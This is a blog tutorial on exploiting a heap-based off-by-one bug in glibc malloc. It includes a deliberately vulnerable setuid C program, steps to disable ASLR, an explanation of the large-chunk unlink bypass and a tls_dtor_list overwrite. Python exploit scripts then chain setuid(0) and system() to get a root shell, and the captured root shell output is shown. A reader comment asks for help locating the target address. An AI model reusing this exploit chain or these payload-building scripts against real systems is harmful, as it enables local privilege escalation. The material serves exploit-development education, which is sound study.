Off-By-One Vulnerability (Heap Based)

Prerequisite: 

  1. Off-By-One Vulnerability (Stack Based)
  2. Understanding glibc malloc

VM Setup: Fedora 20 (x86)

What is off-by-one bug?

As said in this post, copying source string into destination buffer could result in off-by-one when

  1. Source string length is equal to destination buffer length.

When source string length is equal to destination buffer length, a single NULL byte gets copied just above the destination buffer. Here since the destination buffer is located in heap, the single NULL byte could overwrite the chunk header of next chunk and this could lead to arbitrary code execution.

Recap: As said in this post, a heap segment is divided into multiple chunk as per users heap memory request. Each chunk has its own chunk header (represented by malloc_chunk). Structure malloc_chunk contains following four elements:

  1. prev_size – If the previous chunk is free, this field contains the size of previous chunk. Else if previous chunk is allocated, this field contains previous chunk’s user data.
  2. size : This field contains the size of this allocated chunk. Last 3 bits of this field contains flag information.
    • PREV_INUSE (P) – This bit is set when previous chunk is allocated.
    • IS_MMAPPED (M) – This bit is set when chunk is mmap’d.
    • NON_MAIN_ARENA (N) – This bit is set when this chunk belongs to a thread arena.
  3. fd – Points to next chunk in the same bin.
  4. bk – Points to previous chunk in the same bin.

Vulnerable Code:

//consolidate_forward.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define SIZE 16

int main(int argc, char* argv[])
{

 int fd = open("./inp_file", O_RDONLY); /* [1] */
 if(fd == -1) {
 printf("File open error\n");
 fflush(stdout);
 exit(-1);
 }

 if(strlen(argv[1])>1020) { /* [2] */
 printf("Buffer Overflow Attempt. Exiting...\n");
 exit(-2);
 }

 char* tmp = malloc(20-4); /* [3] */
 char* p = malloc(1024-4); /* [4] */
 char* p2 = malloc(1024-4); /* [5] */
 char* p3 = malloc(1024-4); /* [6] */

 read(fd,tmp,SIZE); /* [7] */
 strcpy(p2,argv[1]); /* [8] */

 free(p); /* [9] */
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -o consolidate_forward consolidate_forward.c
$sudo chown root consolidate_forward
$sudo chgrp root consolidate_forward
$sudo chmod +s consolidate_forward

NOTE: ASLR is turned off for our demo purposes. In case if you want to want to bypass ASLR too use information leakage bug or brute force technique as described in this post.

Line [2] and [8] of the above vulnerable code is where the heap based off-by-one overflow could occur. Destination buffer length is 1020 and hence source string of length 1020 bytes could lead to arbitrary code execution.

How arbitrary code execution is achieved?

Arbitrary code execution is achieved when a single null byte overwrites the chunk header of next chunk (‘p3’). When a chunk of size 1020 bytes (‘p2’) gets overflown by a single byte, next chunk (‘p3’) header’s size’s least significant byte gets overwritten with NULL byte and not prev_size’s least significant byte.

Why LSB of size gets overwritten instead of prev_size’s LSB?

checked_request2size converts user requested size into usable size (internal representation size) since some extra space is needed for storing malloc_chunk and also for alignment purposes. Conversion takes place in such a way that last 3 bits of usable size is never set and hence its used for storing flag informations P, M and N.

Thus when malloc(1020) gets executed in our vulnerable code, user request size of 1020 bytes gets converted to ((1020 + 4 + 7) & ~7) 1024 bytes (internal representation size) . Overhead for an allocated chunk of 1020 bytes is only 4 bytes!! But for an allocated chunk we need chunk header of size 8 bytes, inorder to store prev_size and size informations. Thus first 8 bytes of the1024 byte chunk will be used for chunk header, but now we are left with only 1016 (1024-8) bytes for user data instead of 1020 bytes. But as said above in prev_size definition, if previous chunk (‘p2’) is allocated, chunk’s (‘p3’) prev_size field contains user data. Thus prev_size of the chunk (‘p3’) located next to this allocated 1024 byte chunk (‘p2’) contains the remaining 4 bytes of user data!! This is the reason why LSB of size gets overwritten with single NULL byte instead of prev_size!!

Heap Layout:

NOTE: Attacker data in the above picture will be explained in “Overwriting tls_dtor_list” section below!!

Now getting back to our original question

How arbitrary code execution is achieved?

Now we know that on off-by-one error, single null byte overwrites the LSB of next chunk’s (‘p3’) size field. This single NULL byte overwrite means the flag information of that chunk (‘p3’) gets cleared ie) the overflown chunk (‘p2’) becomes free, despite being in allocated state. This state of inconsistency drives glibc code to unlink a chunk (‘p2’) which is already in allocated state when chunk previous (‘p’) to overflown chunk (‘p2’) gets freed!!

As seen in this post, unlinking a chunk which is already in allocated state could lead to arbitrary code execution since any four byte memory region could be written with attacker’s data!! But in the same post, we also saw unlink technique became obsolete because glibc got hardened over the years!! In particular because of the condition “corrupted double linked list“, arbitrary code execution wasn’t possible!!

But in late 2014, google’s project zero team found out a way to successfully bypass “corrupted double linked list” condition by unlinking a large chunk!!

Unlink:

#define unlink(P, BK, FD) { 
  FD = P->fd; 
  BK = P->bk;
  // Primary circular double linked list hardening - Run time check
  if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) /* [1] */
   malloc_printerr (check_action, "corrupted double-linked list", P); 
  else { 
   // If we have bypassed primary circular double linked list hardening, below two lines helps us to overwrite any 4 byte memory region with arbitrary data!!
   FD->bk = BK; /* [2] */
   BK->fd = FD; /* [3] */
   if (!in_smallbin_range (P->size) 
   && __builtin_expect (P->fd_nextsize != NULL, 0)) { 
    // Secondary circular double linked list hardening - Debug assert
    assert (P->fd_nextsize->bk_nextsize == P);  /* [4] */
        assert (P->bk_nextsize->fd_nextsize == P); /* [5] */
    if (FD->fd_nextsize == NULL) { 
     if (P->fd_nextsize == P) 
      FD->fd_nextsize = FD->bk_nextsize = FD; 
     else { 
      FD->fd_nextsize = P->fd_nextsize; 
      FD->bk_nextsize = P->bk_nextsize; 
      P->fd_nextsize->bk_nextsize = FD; 
      P->bk_nextsize->fd_nextsize = FD; 
     } 
    } else { 
     // If we have bypassed secondary circular double linked list hardening, below two lines helps us to overwrite any 4 byte memory region with arbitrary data!!
     P->fd_nextsize->bk_nextsize = P->bk_nextsize; /* [6] */
     P->bk_nextsize->fd_nextsize = P->fd_nextsize; /* [7] */
    } 
   } 
  } 
}

In glibc malloc, primary circular double linked list is maintained by fd and bk fields of malloc_chunk while secondary circular double linked linked is maintained by fd_nextsize and bk_nextsize fields of malloc_chunk. It looks like corrupted double linked list hardening is applied to both primary (line [1]) and secondary (lines [4] and [5]) double linked list, but hardening for secondary circular double linked list is only a debug assert statement (and NOT a runtime check like primary circular double linked list hardening) which doesnt get compiled into production build (atleast in fedora (x86) machines). Thus secondary circular double linked list hardening (lines [4] and [5]) as no significance, which allows us to write arbitrary data to any 4 byte memory region (lines [6] and [7]).

Still few things are to be cleared up, so lets see here in more detail of how unlinking a large chunk leads to arbitrary code execution!! Since attacker has control over – to be freed large chunk, he overwrites malloc_chunk elements as said below:

  • fd should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • bk also should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • fd_nextsize should point to free_got_addr – 0x14
  • bk_nextsize should point to system_addr

But lines [6] and [7], wants both fd_nextsize and bk_nextsize to be writable. fd_nextsize is writable (since it points to free_got_addr – 0x14) but bk_nextsize isnt writable since it points to system_addr which belongs to text segment of libc.so!!  This problem of wanting both fd_nextsize and bk_nextsize to be writable is solved by overwriting tls_dtor_list.

Overwriting tls_dtor_list:

tls_dtor_list is a thread-local variable which contains a list of function pointers to be invoked during exit(). __call_tls_dtors walks through tls_dtor_list and invokes the function one by one!! Thus if we can overwrite tls_dtor_list with a heap address which contains system and system_arg in place of func and obj of dtor_list, system() could be invoked!!

Thus now attacker overwrites, to be freed large chunk’s malloc_chunk elements as said below:

  • fd should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • bk also should point back to freed chunk address to pass primary circular doubled linked list hardening!!
  • fd_nextsize should point to tls_dtor_list – 0x14
  • bk_nextsize should point to heap address which contains a dtor_list element!!

– Problem of fd_nextsize being writable is solved since tls_dtor_list belongs to writable segment of libc.so and by disassembling __call_tls_dtors(), tls_dtor_list address is found out to be at 0xb7fe86d4.

– Problem of bk_next size being writable is solved since it points to heap address.

With all these informations, lets write an exploit program to attack the vulnerable binary ‘consolidate_forward’!!

Exploit Code:

#exp_try.py
#!/usr/bin/env python
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b430
system = 0x4e0a86e0
sh = 0x80482ce

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing above exploit code doesnt gives us root shell, it gives us a bash shell running at our own privilege level. Hmmm…

$ python -c 'print "A"*16' > inp_file
$ python exp_try.py 
Calling vulnerable program
sh-4.2$ id
uid=1000(sploitfun) gid=1000(sploitfun) groups=1000(sploitfun),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2$ exit
exit
$

Why root shell wasn’t obtained?

/bin/bash drops off privileges when uid != euid. Our binary ‘consolidate _forward”s real uid = 1000 and its effective uid = 0. Hence when system() gets invoked bash drops off the privileges since real uid != effective uid!! To solve this problem we need to invoke setuid(0) before system() and since _call_tls_dtors() walks through tls_dtor_list one by one, we need to chain setuid() and system() inorder to obtain root shell!!

Full Exploit Code:

#gen_file.py
#!/usr/bin/env python
import struct

#dtor_list
setuid = 0x4e123e30
setuid_arg = 0x0
mp = 0x804b020
nxt = 0x804b430

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

tst = conv(setuid)
tst += conv(setuid_arg)
tst += conv(mp)
tst += conv(nxt)

print tst
-----------------------------------------------------------------------------------------------------------------------------------
#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

fd = 0x0804b418
bk = 0x0804b418
fd_nextsize = 0xb7fe86c0
bk_nextsize = 0x804b008
system = 0x4e0a86e0
sh = 0x80482ce

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = conv(fd)
buf += conv(bk)
buf += conv(fd_nextsize)
buf += conv(bk_nextsize)
buf += conv(system)
buf += conv(sh)
buf += "A" * 996

print "Calling vulnerable program"
call(["./consolidate_forward", buf])

Executing above exploit code gives us root shell!!

$ python gen_file.py > inp_file
$ python exp.py 
Calling vulnerable program
sh-4.2# id
uid=0(root) gid=1000(sploitfun) groups=0(root),10(wheel),1000(sploitfun) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit
$

Our off-by-one vulnerable code consolidates chunks in forward direction, similarly chunks can also be consolidated in backward direction. Such off-by-one vulnerable codes which consolidates chunks in backward direction can also be exploited!!

2 thoughts on “Off-By-One Vulnerability (Heap Based)

  1. Hello, sploitfun~:)
    First of all, Thank you for greate article

    I have a question. I follow this document( off-by-one-vulnerability(heap-based)).
    but, I don’t know how to disassemble __call_tls_dtors() to find tls_dtor_list address.

    I tried to disassemble __call_tls_dtors() in consolidate_forward binary file(above vuln file) on my machine(unbuntu 12.04 32 bit)
    gdb doesn’t know __call_tls_dtors symbol. how to disassemble _call_tls_dtors symbol.?
    ================
    (gdb) disas __c
    __check_rhosts_file __ctype32_tolower __ctype_toupper
    __chk_fail __ctype32_toupper __ctype_toupper_loc
    __clone __ctype_b __curbrk
    __close __ctype_b_loc __cxa_at_quick_exit
    __cmsg_nxthdr __ctype_get_mb_cur_max __cxa_atexit
    __confstr_chk __ctype_init __cxa_finalize
    __connect __ctype_tolower __cyg_profile_func_enter
    __ctype32_b __ctype_tolower_loc __cyg_profile_func_exit

    ================

    Could you give me the hint of disassembling __call_tls_dtors() and finding tls_dtor_list address ?

    Thank you for reading my message. Have a good day~

    Like

Leave a comment